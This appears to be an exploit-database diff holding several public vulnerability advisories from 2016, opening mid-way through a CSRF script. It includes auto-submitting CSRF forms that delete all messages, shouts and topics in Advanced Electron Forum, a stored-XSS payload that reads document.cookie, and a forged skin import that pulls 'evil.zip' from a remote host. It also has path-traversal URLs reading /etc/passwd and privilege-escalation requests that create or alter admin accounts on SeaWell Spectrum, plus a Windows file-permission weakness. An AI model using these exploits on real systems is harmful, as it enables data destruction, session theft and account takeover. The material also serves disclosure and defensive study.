if(c % 2 == 0){
arguments[3].value=c
document.getElementById(arguments[1]).submit()
}else{
arguments[2].value=c
document.getElementById(arguments[0]).submit()
}
if(c>=amttodelete){
clearInterval(uwillsuffer)
alert("Done!")
}
}
uwillsuffer = setInterval(RUIN_EVERYTHING, 1000, "DOOM", "DESTRUCT", inbox,
outbox)
</script>
CSRF 0x03:
Delete all 'Shouts'
<form accept-charset="ISO-8859-1" id="SPECTOR_OF_HATE" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=conpan&seadact=shoutboxset"
method="post">
<input type="hidden" name="shouts" value="10" />
<input type="hidden" name="shoutboxtime" value="1440" />
<input type="hidden" name="shoutbox_emot" value="on" />
<input type="hidden" name="shoutbox_nbbc" value="on" />
<input type="hidden" name="truncatetable" value="on" />
<input type="hidden" name="delallshouts" value="Delete" />
<script>document.getElementById('SPECTOR_OF_HATE').submit()</script>
</form>
CSRF 0x04:
Delete all 'Topics' via simple GET request, this will delete topics 1 thru
7...
http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic&topid=7,6,5,4,3,2,1
Disclosure Timeline:
=======================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure
Exploitation Technique:
======================
Remote
Severity Level:
================
High
Description:
===================================================================
Request Method(s): [+] POST / GET
Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
===================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

139
platforms/php/webapps/39262.txt Executable file
View file

@ -0,0 +1,139 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt
Vendor:
=============================
www.anelectron.com/downloads/
Product:
====================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
Vulnerability Type:
===================
Persistent XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
In Admin panel under Edit Boards / General Stuff / General Options
There is an option to sepcify a redirect URL for the forum.
See --> Redirect Forum:
Enter a URL to which this forum will be redirected to.
The redirect input field is vulnerable to a persistent XSS that will be
stored in the MySQL database
and execute attacker supplied client side code each time a victim visits
the following URLs.
http://localhost/AEF(1.0.9)_Install/index.php?
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1
Exploit code(s):
===============
Persistent XSS
<form id="XSS-DE-PERSISTO" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1"
method="post">
<input type="hidden" name="editmother" value="c1" />
<input type="hidden" name="forder" value="1" />
<input type="hidden" name="fstatus" value="1" />
<input type="hidden" name="fredirect" value='"/><script>alert("XSS
hyp3rlinx \n\n" + document.cookie)</script>' />
<input type="hidden" name="fimage" value="" />
<input type="hidden" name="fname" value="Generals" />
<input type="hidden" name="fdesc" value="hyp3rlinx" />
<input type="hidden" name="ftheme" value="0" />
<input type="hidden" name="frulestitle" value="MAYHEM" />
<input type="hidden" name="frules" value="0" />
<input type="hidden" name="rss" value="10" />
<input type="hidden" name="rss_topic" value="0" />
<input type="hidden" name="member[-1]" value="on" />
<input type="hidden" name="member[0]" value="on" />
<input type="hidden" name="member[3]" value="on" />
<input type="hidden" name="inc_mem_posts" value="on" />
<input type="hidden" name="allow_poll" value="on" />
<input type="hidden" name="allow_html" value="on" />
<input type="hidden" name="mod_posts" value="on" />
<input type="hidden" name="editboard" value="Edit+Forum" />
<script>document.getElementById('XSS-DE-PERSISTO').submit()</script>
</form>
Some other misc XSS(s) under 'Signature' area.
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=signature
on Anchor link setting
http://"onMouseMove="alert(0)
AND
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=writepm
email link:
mailto:"onMouseMove="alert(1)
Disclosure Timeline:
=====================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
=================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
Vulnerable Parameter(s): [+] 'fredirect'
=================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

113
platforms/php/webapps/39263.txt Executable file
View file

@ -0,0 +1,113 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt
Vendor:
=============================
www.anelectron.com/downloads/
Product:
================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
Vulnerability Type:
============================
Remote File Inclusion / CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
In Admin control panel there is option to Import Skins and one choice is
using a web URL.
From AEF:
"Specify the URL of the theme on the net. The theme file must be a
compressed archive (zip, tgz, tbz2, tar)."
However there is no CSRF token or check made that this is a valid request
made by the currently logged in user, resulting
in arbitrary remote file imports from an attacker if the user visits or
clicks an malicious link. Victims will then be left
open to arbitrary malicious file downloads from anywhere on the net which
may be used as a platform for further attacks...
Exploit code(s):
===============
<form id="EL-DOWNLOADO" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=skin&seadact=import"
method="post">
<input type="hidden" name="folderpath" value="../" />
<input type="hidden" name="importtype" value="2" />
<input type="hidden" name="weburl" value="
http://hyp3rlinx.altervista.org/evil.zip" />
<input type="hidden" name="filepath" value="../" />
<input type="hidden" name="uploadtheme" value="" />
<input type="hidden" name="importskin" value="Import" />
<script>document.getElementById('EL-DOWNLOADO').submit()</script>
</form>
Disclosure Timeline:
======================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Description:
==================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] Advanced Electron Forum v1.0.9 (AEF)
==================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

105
platforms/php/webapps/39266.txt Executable file
View file

@ -0,0 +1,105 @@
# Exploit Title: [SeaWell Networks Spectrum - Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.seawellnetworks.com/spectrum/]
# Versions Reported: [Spectrum SDC 02.05.00, Build 02.05.00.0016]
CVE-ID:
CVE-2015-8282
CVE-2015-8283
CVE-2015-8284
About SeaWell Networks Spectrum
Session Delivery Control
SeaWell set out to improve the way operators control, monetize and scale their IP video offerings, to meet the growing subscriber demands for video delivered to smartphones, tablets and game consoles.
The result Spectrum is what we call a “Multiscreen 2.0” Session Delivery Controller.
Spectrum is high-performance, carrier-grade software that takes ABR video and repackages it on-the-fly into any other protocol, including Apple HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.
http://www.seawellnetworks.com/spectrum/
Affected version
Spectrum SDC 02.05.00
Build 02.05.00.0016
Copyright (c) 2015 SeaWell Networks Inc.
A. CWE-255: Credentials Management
CVE-2015-8282
Weak, default login credentials - admin / admin
B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVE-2015-8283
The configure_manage.php module accepts a file parameter which takes an unrestricted file path as input, allowing an attacker (non-admin, low- privileged user) to read arbitrary files on the system.
PoC:
https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd
C. CWE-285: Improper Authorization
CVE-2015-8284
A low privileged, non-admin user, with only viewer privileges, can perform administrative functions, such as create, update, delete a user (including admin user), or access device's configuration files (policy.xml, cookie_config.xml, systemCfg.xml). The application lacks Authorization controls to restrict any non-admin users from performing admin functions.
The application users can have admin or viewer privilege levels. Admin has full access to the device. Viewer has access to very restricted functions.
It is possible for a viewer priv user to perform admin functions.
PoC:
Add new user [Admin function only]
GET /system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow= HTTP/1.1
https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=
Here
admin -> userlevel=9
viewer -> userlevel=1
Create new user with Admin privs
Log in as viewer - try create new admin user - viewer1
https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=
<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>
Delete user
https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4
Modify existing user (including admin)
log in as viewer - try change system (admin) user
https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4
<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>
Change Admin password
log in as viewer - try change admin pass
https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3
<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>
Downloading configuration xml files
viewer priv user has no access/option to config xmls via GUI. It is possible to download the configs by calling the url directly
Access policy config xml
https://IP/configure_manage.php?action=download_config&file=policy.xml
Access cookie config xml
https://IP/configure_manage.php?action=download_config&file=cookie_config.xml
Access system config xml
https://IP/configure_manage.php?action=download_config&file=systemCfg.xml
+++++
--
Best Regards,
Karn Ganeshen

66
platforms/windows/local/39260.txt Executable file
View file

@ -0,0 +1,66 @@

WEG SuperDrive G2 v12.0.0 Insecure File Permissions
Vendor: WEG Group
Product web page: http://www.weg.net
Affected version: SuperDrive G2 (v12.0.0 Build 20150930-J1.8.0_60-NB8.0.2)
SuperDrive (v7.0.0)
Summary: SuperDrive is a Windows graph tool for parameter setting,
control and monitor of WEG Drives. It permits to edit directly in the
drive online parameters, or to edit offline parameter files stored
in the microcomputer. It enables you to store parameters of all drives
that exist in the installation. The software also incorporates functions
enable the upload to the drive of the microcomputer parameters sets
as well as the download from the drive to the microcomputer. The
communication between drive and microcomputer is realized via RS232
serial interface (point to point) or by RS485 for network linkage.
Desc: SuperDrive suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'C' flag (Change) for 'Authenticated
Users' group.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Java 1.8.0_60
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5294
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5294.php
25.11.2015
--
C:\WEG\SuperDrive 7.0.0>cacls SuperDrive.exe
C:\WEG\SuperDrive 7.0.0\SuperDrive.exe BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
BUILTIN\Users:R
NT AUTHORITY\Authenticated Users:C
C:\WEG\SuperDrive 7.0.0>
C:\WEG\SuperDrive G2 12.0.0>cacls *.exe
C:\WEG\SuperDrive G2 12.0.0\SuperDriveG2.exe BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
BUILTIN\Users:R
NT AUTHORITY\Authenticated Users:C
C:\WEG\SuperDrive G2 12.0.0\unins000.exe BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
BUILTIN\Users:R
NT AUTHORITY\Authenticated Users:C
C:\WEG\SuperDrive G2 12.0.0>